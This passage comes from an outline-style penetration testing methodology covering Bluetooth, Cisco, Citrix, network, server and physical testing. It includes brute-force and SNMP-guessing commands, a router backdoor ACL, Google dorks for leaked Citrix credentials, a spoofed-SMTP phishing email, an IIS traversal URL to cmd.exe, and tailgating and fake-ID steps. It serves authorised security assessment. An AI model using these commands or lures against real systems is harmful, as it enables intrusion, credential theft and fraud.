21.1.3.3.4. Trojan attacks

21.1.3.3.5. Hacking from AS/400

21.2. Local

21.2.1. System Value Security

21.2.1.1. Untitled

21.2.1.1.1. Untitled

21.2.1.2. Untitled

21.2.1.2.1. Untitled

21.2.1.3. Untitled

21.2.1.3.1. Untitled

21.2.1.4. Untitled

21.2.1.4.1. Recommended value is 30

21.2.2. Password Policy

21.2.2.1. Untitled

21.2.2.1.1. Untitled

21.2.2.2. Untitled

21.2.2.2.1. Untitled

21.2.2.3. Untitled

21.2.2.3.1. Untitled

21.2.2.4. Untitled

21.2.2.4.1. Untitled

21.2.2.5. Untitled

21.2.3. Audit level

21.2.3.1. Untitled

21.2.3.1.1. Recommended value is *SECURITY

21.2.4. Documentation

21.2.4.1. Users class

21.2.4.1.1. Untitled

21.2.4.2. System Audit Settings

21.2.4.2.1. Untitled

21.2.4.3. Special Authorities Definitions

21.2.4.3.1. Untitled

22. Bluetooth Specific Testing

22.1. Bluescanner

22.2. Bluesweep

22.3. btscanner

22.4. Redfang

22.5. Blueprint

22.6. Bluesnarfer

22.7. Bluebugger

22.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

22.8. Blueserial

22.9. Bloover

22.10. Bluesniff

22.11. Exploit Frameworks

22.11.1. BlueMaho

22.11.1.1. Untitled

22.12. Resources

22.12.1. URL's

22.12.1.1. BlueStumbler.org

22.12.1.2. Bluejackq.com

22.12.1.3. Bluejacking.com

22.12.1.4. Bluejackers

22.12.1.5. bluetooth-pentest

22.12.1.6. ibluejackedyou.com

22.12.1.7. Trifinite

22.12.2. Vulnerability Information

22.12.2.1. Common Vulnerabilities and Exploits (CVE)

22.12.2.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth

22.12.3. White Papers

22.12.3.1. Bluesnarfing

23. Cisco Specific Testing

23.1. Methodology

23.1.1. Scan & Fingerprint.

23.1.1.1. Untitled

23.1.1.2. Untitled

23.1.1.3. If SNMP is active, then community string guessing should be performed.

23.1.2. Credentials Guessing.

23.1.2.1. Untitled

23.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

23.1.3. Connect

23.1.3.1. Untitled

23.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

23.1.4. Check for bugs

23.1.4.1. Untitled

23.1.4.1.1. The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact. 

23.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

23.1.5. Further your attack

23.1.5.1. Untitled

23.1.5.1.1. running-config is the currently running configuration settings.  This gets loaded from the startup-config on boot.  This configuration file is editable and the changes are immediate.  Any changes will be lost once the router is rebooted.  It is this file that requires altering to maintain a non-permenant connection through to the internal network.  

23.1.5.1.2. startup-config is the boot up configuration file.  It is this file that needs altering to maintain a permenant  connection through to the internal network.  

23.1.5.2. Untitled

23.1.5.2.1. #> access-list 100 permit ip <IP> any

23.2. Scan & Fingerprint.

23.2.1. Port Scanning

23.2.1.1. nmap

23.2.1.1.1. Untitled

23.2.1.2. Other tools

23.2.1.2.1. Untitled

23.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

23.2.2. Fingerprinting

23.2.2.1. Untitled

23.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

23.2.2.2. Untitled

23.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

23.2.2.2.2. Untitled

23.3. Password Guessing.

23.3.1. Untitled

23.3.1.1. ./CAT  -h  <IP>  -a  password.wordlist

23.3.1.2. Untitled

23.3.2. Untitled

23.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]

23.3.2.2. Untitled

23.3.3. Untitled

23.3.3.1. BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco

23.3.3.2. Untitled

23.4. SNMP Attacks.

23.4.1. Untitled

23.4.1.1. ./CAT  -h  <IP>  -w  SNMP.wordlist

23.4.1.2. Untitled

23.4.2. Untitled

23.4.2.1. onesixytone  -c  SNMP.wordlist  <IP>

23.4.2.2. BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt  10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug

23.4.3. Untitled

23.4.3.1. snmapwalk  -v  <Version>  -c  <Community string>  <IP>

23.4.3.2. Untitled

23.5. Connecting.

23.5.1. Telnet

23.5.1.1. Untitled

23.5.1.1.1.  telnet  <IP>

23.5.1.1.2. Sample Banners

23.5.2. SSH

23.5.3. Web Browser

23.5.3.1. Untitled

23.5.3.1.1. This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:

23.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:

23.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

23.5.4. TFTP

23.5.4.1. Untitled

23.5.4.1.1. Untitled

23.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.

23.5.4.2. Untitled

23.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>

23.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>

23.5.4.2.3. Creating backdoors in Cisco IOS using TCL

23.6. Known Bugs.

23.6.1. Attack Tools

23.6.1.1. Untitled

23.6.1.1.1. Untitled

23.6.1.2. Untitled

23.6.1.2.1. Web browse to the Cisco device: http://<IP>

23.6.1.2.2. Untitled

23.6.1.2.3. Untitled

23.6.1.2.4. Untitled

23.6.1.3. Untitled

23.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt

23.6.2. Common Vulnerabilities and Exploits (CVE) Information

23.6.2.1. Vulnerabilties and exploit information relating to these products can be found here:http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

23.7. Configuration Files.

23.7.1. Untitled

23.7.1.1. Configuration files explained

23.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.

23.7.1.1.2. Untitled

23.7.1.1.3. Untitled

23.7.1.1.4. Password Encryption Utilised

23.7.1.1.5. Untitled

23.7.1.2. Configuration Testing Tools

23.7.1.2.1. Nipper

23.7.1.2.2. fwauto (Beta)

23.8. References.

23.8.1. Cisco IOS Exploitation Techniques

24. Citrix Specific Testing

24.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix

24.2. Enumeration

24.2.1. web search

24.2.1.1. Google (GHDB)

24.2.1.1.1. ext:ica

24.2.1.1.2. inurl:citrix/metaframexp/default/login.asp

24.2.1.1.3. [WFClient] Password= filetype:ica

24.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On

24.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

24.2.1.1.6. inurl:/Citrix/Nfuse17/

24.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx

24.2.1.2. Google Hacks (Author Discovered)

24.2.1.2.1. filetype:ica Username=

24.2.1.2.2. inurl:/Citrix/AccessPlatform/

24.2.1.2.3. inurl:LogonAgent/Login.asp

24.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp

24.2.1.2.5. inurl:/Citrix/NFuse161/login.asp

24.2.1.2.6. inurl:/Citrix/NFuse16

24.2.1.2.7. inurl:/Citrix/NFuse151/

24.2.1.2.8. allintitle:MetaFrame XP Login

24.2.1.2.9. allintitle:MetaFrame Presentation Server Login

24.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On

24.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login

24.2.1.3. Yahoo

24.2.1.3.1. originurlextension:ica

24.2.2. site search

24.2.2.1. Manual

24.2.2.1.1. review web page for useful information

24.2.2.1.2. review source for web page

24.2.3. generic

24.2.3.1. nmap -A -PN -p 80,443,1494 ip_address

24.2.3.2. amap -bqv ip_address port_no.

24.2.4. citrix specific

24.2.4.1. enum.pl

24.2.4.1.1. perl enum.pl ip_address

24.2.4.2. enum.js

24.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address

24.2.4.3. connect.js

24.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application

24.2.4.4. Citrix-pa-scan

24.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri

24.2.4.5. pabrute.c

24.2.4.5.1. ./pabrute pubapp list app_list ip_address

24.2.5. Default Ports

24.2.5.1. TCP

24.2.5.1.1. Citrix XML Service

24.2.5.1.2. Advanced Management Console

24.2.5.1.3. Citrix SSL Relay

24.2.5.1.4. ICA sessions

24.2.5.1.5. Server to server

24.2.5.1.6. Management Console to server

24.2.5.1.7. Session Reliability (Auto-reconnect)

24.2.5.1.8. License Management Console

24.2.5.1.9. License server

24.2.5.2. UDP

24.2.5.2.1. Clients to ICA browser service

24.2.5.2.2. Server-to-server

24.2.6. nmap nse scripts

24.2.6.1. citrix-enum-apps

24.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>

24.2.6.2. citrix-enum-apps-xml

24.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>

24.2.6.3. citrix-enum-servers

24.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604

24.2.6.4. citrix-enum-servers-xml

24.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>

24.2.6.5. citrix-brute-xml

24.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

24.3. Scanning

24.3.1. Nessus

24.3.1.1. Plugins

24.3.1.1.1. CGI abuses

24.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)

24.3.1.1.3. Misc.

24.3.1.1.4. Service Detection

24.3.1.1.5. Web Servers

24.3.1.1.6. Windows

24.3.2. Nikto

24.3.2.1. perl nikto.pl -host ip_address -port port_no.

24.3.2.1.1. Untitled

24.4. Exploitation

24.4.1. Alter default .ica files

24.4.1.1. InitialProgram=cmd.exe

24.4.1.2. InitialProgram=explorer.exe

24.4.2. Enumerate and Connect

24.4.2.1. For applications identified by Citrix-pa-scan

24.4.2.1.1. Pas

24.4.2.2. For published applications with a Citrix client when the master browser is non-public.

24.4.2.2.1. Citrix-pa-proxy

24.5. Brute Force

24.5.1. bforce.js

24.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2

24.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

24.5.1.3. Untitled

24.6. Review Configuration Files

24.6.1. Application server configuration file

24.6.1.1. appsrv.ini

24.6.1.1.1. Location

24.6.1.1.2. World writeable

24.6.1.1.3. Review other files

24.6.1.1.4. Sample file

24.6.2. Program Neighborhood configuration file

24.6.2.1. pn.ini

24.6.2.1.1. Location

24.6.2.1.2. Review other files

24.6.2.1.3. Sample file

24.6.3. Citrix ICA client configuration file

24.6.3.1. wfclient.ini

24.6.3.1.1. Location

24.7. References

24.7.1. Vulnerabilities

24.7.1.1. Art of Hacking

24.7.1.2. Common Vulnerabilities and Exploits (CVE)

24.7.1.2.1. Sample file

24.7.1.2.2. Untitled

24.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix

24.7.1.3. OSVDB

24.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia

24.7.1.4. Secunia

24.7.1.5. Security-database.com

24.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix

24.7.1.6. SecurityFocus

24.7.2. Support

24.7.2.1. Citrix

24.7.2.1.1. Knowledge Base

24.7.2.2. Thinworld

24.7.3. Exploits

24.7.3.1. Milw0rm

24.7.3.1.1. http://www.milw0rm.com/search.php

24.7.3.2. Art of Hacking

24.7.3.2.1. Citrix

24.7.4. Tools Resource

24.7.4.1. Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access

25. Network Backbone

25.1. Generic Toolset

25.1.1. Wireshark (Formerly Ethereal)

25.1.1.1. Passive Sniffing

25.1.1.1.1. Usernames/Passwords

25.1.1.1.2. Email

25.1.1.1.3. FTP

25.1.1.1.4. HTTP

25.1.1.1.5. HTTPS

25.1.1.1.6. RDP

25.1.1.1.7. VOIP

25.1.1.1.8. Other

25.1.1.2. Filters

25.1.1.2.1. ip.src == ip_address

25.1.1.2.2. ip.dst == ip_address

25.1.1.2.3. tcp.dstport == port_no.

25.1.1.2.4. ! ip.addr == ip_address

25.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

25.1.2. Cain & Abel

25.1.2.1. Active Sniffing

25.1.2.1.1. ARP Cache Poisoning

25.1.2.1.2. DNS Poisoning

25.1.2.1.3. Routing Protocols

25.1.3. Cisco-Torch

25.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>

25.1.4. NTP-Fingerprint

25.1.4.1. perl ntp-fingerprint.pl -t [ip_address]

25.1.5. Yersinia

25.1.6. p0f

25.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

25.1.7. Manual Check (Credentials required)

25.1.8. MAC Spoofing

25.1.8.1. mac address changer for windows

25.1.8.2. macchanger

25.1.8.2.1. Random Mac Address:- macchanger -r eth0

25.1.8.3. madmacs

25.1.8.4. smac

25.1.8.5. TMAC

26. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

26.1. Password Attacks

26.1.1. Known Accounts

26.1.1.1. Identified Passwords

26.1.1.2. Unidentified Hashes

26.1.2. Default Accounts

26.1.2.1. Identified Passwords

26.1.2.2. Unidentified Hashes

26.2. Exploits

26.2.1. Successful Exploits

26.2.1.1. Accounts

26.2.1.1.1. Passwords

26.2.1.1.2. Groups

26.2.1.1.3. Other Details

26.2.1.2. Services

26.2.1.3. Backdoor

26.2.1.4. Connectivity

26.2.2. Unsuccessful Exploits

26.2.3. Resources

26.2.3.1. Securiteam

26.2.3.1.1. Exploits are sorted by year and must be downloaded individually

26.2.3.2. SecurityForest

26.2.3.2.1. Updated via CVS after initial install

26.2.3.3. GovernmentSecurity

26.2.3.3.1. Need to create and account to obtain access

26.2.3.4. Red Base Security

26.2.3.4.1. Oracle Exploit site only

26.2.3.5. Wireless Vulnerabilities & Exploits (WVE)

26.2.3.5.1. Wireless Exploit Site

26.2.3.6. PacketStorm Security

26.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.

26.2.3.7. SecWatch

26.2.3.7.1. Exploits sorted by year and month, download seperately

26.2.3.8. SecurityFocus

26.2.3.8.1. Exploits must be downloaded individually

26.2.3.9. Metasploit

26.2.3.9.1. Install and regualrly update via svn

26.2.3.10. Milw0rm

26.2.3.10.1. Exploit archived indexed and sorted by port download as a whole - The one to go for!

26.3. Tools

26.3.1. Metasploit

26.3.1.1. Free Extra Modules

26.3.1.1.1. local copy

26.3.2. Manual SQL Injection

26.3.2.1. Understanding SQL Injection

26.3.2.2. SQL Injection walkthrough

26.3.2.3. SQL Injection by example

26.3.2.4. Blind SQL Injection

26.3.2.5. Advanced SQL Injection in SQL Server

26.3.2.6. More Advanced SQL Injection

26.3.2.7. Advanced SQL Injection in Oracle databases

26.3.2.8. SQL Cheatsheets

26.3.2.8.1. Untitled

26.3.3. SQL Power Injector

26.3.4. SecurityForest

26.3.5. SPI Dynamics WebInspect

26.3.6. Core Impact

26.3.7. Cisco Global Exploiter

26.3.8. PIXDos

26.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]

26.3.9. CANVAS

26.3.10. Inguma

27. Server Specific Tests

27.1. Databases

27.1.1. Direct Access Interrogation

27.1.1.1. MS SQL Server

27.1.1.1.1. Ports

27.1.1.1.2. Version

27.1.1.1.3. osql

27.1.1.2. Oracle

27.1.1.2.1. Ports

27.1.1.2.2. TNS Listener

27.1.1.2.3. SQL Plus

27.1.1.2.4. Default Account/Passwords

27.1.1.2.5. Default SID's

27.1.1.3. MySQL

27.1.1.3.1. Ports

27.1.1.3.2. Version

27.1.1.3.3. Users/Passwords

27.1.1.4. DB2

27.1.1.5. Informix

27.1.1.6. Sybase

27.1.1.7. Other

27.1.2. Scans

27.1.2.1. Default Ports

27.1.2.2. Non-Default Ports

27.1.2.3. Instance Names

27.1.2.4. Versions

27.1.3. Password Attacks

27.1.3.1. Sniffed Passwords

27.1.3.1.1. Cracked Passwords

27.1.3.1.2. Hashes

27.1.3.2. Direct Access Guesses

27.1.4. Vulnerability Assessment

27.1.4.1. Automated

27.1.4.1.1. Reports

27.1.4.1.2. Vulnerabilities

27.1.4.2. Manual

27.1.4.2.1. Patch Levels

27.1.4.2.2. Confirmed Vulnerabilities

27.2. Mail

27.2.1. Scans

27.2.2. Fingerprint

27.2.2.1. Manual

27.2.2.2. Automated

27.2.3. Spoofable

27.2.3.1. Telnet spoof

27.2.3.1.1. telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target [email protected].

27.2.4. Relays

27.3. VPN

27.3.1. Scanning

27.3.1.1. 500 UDP IPSEC

27.3.1.2. 1723 TCP PPTP

27.3.1.3. 443 TCP/SSL

27.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27

27.3.1.5. ipsecscan 80.75.68.22 80.75.68.27

27.3.2. Fingerprinting

27.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27

27.3.3. PSK Crack

27.3.3.1. ikeprobe 80.75.68.27

27.3.3.2. sniff for responses with C&A or ikecrack

27.4. Web

27.4.1. Vulnerability Assessment

27.4.1.1. Automated

27.4.1.1.1. Reports

27.4.1.1.2. Vulnerabilities

27.4.1.2. Manual

27.4.1.2.1. Patch Levels

27.4.1.2.2. Confirmed Vulnerabilities

27.4.2. Permissions

27.4.2.1. PUT /test.txt HTTP/1.0

27.4.2.2. CONNECT mail.another.com:25 HTTP/1.0

27.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6

27.4.3. Scans

27.4.4. Fingerprinting

27.4.4.1. Other

27.4.4.2. HTTP

27.4.4.2.1. Commands

27.4.4.2.2. Modules

27.4.4.2.3. File Extensions

27.4.4.3. HTTPS

27.4.4.3.1. Commands

27.4.4.3.2. Commands

27.4.4.3.3. File Extensions

27.4.5. Directory Traversal

27.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

28. Physical Security

28.1. Building Security

28.1.1. Meeting Rooms

28.1.1.1. Check for active network jacks.

28.1.1.2. Check for any information in room.

28.1.2. Lobby

28.1.2.1. Check for active network jacks.

28.1.2.2. Does receptionist/guard leave lobby?

28.1.2.3. Accessbile printers? Print test page.

28.1.2.4. Obtain phone/personnel listing.

28.1.3. Communal Areas

28.1.3.1. Check for active network jacks.

28.1.3.2. Check for any information in room.

28.1.3.3. Listen for employee conversations.

28.1.4. Room Security

28.1.4.1. Resistance of lock to picking.

28.1.4.1.1. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?

28.1.4.2. Ceiling access areas.

28.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

28.1.5. Windows

28.1.5.1. Check windows/doors for visible intruderalarm sensors.

28.1.5.2. Check visible areas for sensitive information.

28.1.5.3. Can you video users logging on?

28.2. Perimeter Security

28.2.1. Fence Security

28.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.

28.2.2. Exterior Doors

28.2.2.1. If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.

28.2.3. Guards

28.2.3.1. Patrol Routines

28.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.

28.2.3.2. Communications

28.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.

28.3. Entry Points

28.3.1. Guarded Doors

28.3.1.1. Piggybacking

28.3.1.1.1. Attempt to closely follow employees into thebuilding without having to show valid credentials.

28.3.1.2. Fake ID

28.3.1.2.1. Attempt to use fake ID to gain access.

28.3.1.3. Access Methods

28.3.1.3.1. Test 'out of hours' entry methods

28.3.2. Unguarded Doors

28.3.2.1. Identify all unguardedentry points.

28.3.2.1.1. Are doors secured?

28.3.2.1.2. Check locks for resistance to lock picking.

28.3.3. Windows

28.3.3.1. Check windows/doors for visible intruderalarm sensors.

28.3.3.1.1. Attempt to bypass sensors.

28.4. Office Waste

28.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc

29. Final Report - template

30. Contributors

30.1. Matt Byrne (WirelessDefence.org)

30.1.1. Matt contributed the majority of the Wireless section.

30.2. Arvind Doraiswamy (Paladion.net)

30.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

30.3. Lee Lawson (Dns.co.uk)

30.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

30.4. Nabil OUCHN (Security-database.com)